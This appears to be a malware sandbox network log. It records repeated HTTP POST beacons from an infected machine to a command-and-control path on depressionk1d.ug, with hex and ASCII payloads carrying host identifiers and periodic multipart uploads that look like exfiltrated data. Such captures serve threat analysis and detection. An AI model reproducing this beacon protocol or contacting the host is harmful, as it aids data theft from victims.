              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----aa227d1941f848e55ff8e80a839e1f4cHost: depressionk1d.ugContent-Length: 106956Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----72f5cde377fbc84156c9f93b3b5c40e7Host: depressionk1d.ugContent-Length: 106960Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
